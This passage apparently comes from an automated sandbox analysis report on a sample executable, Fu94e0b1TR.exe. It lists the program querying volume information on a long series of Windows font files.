            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
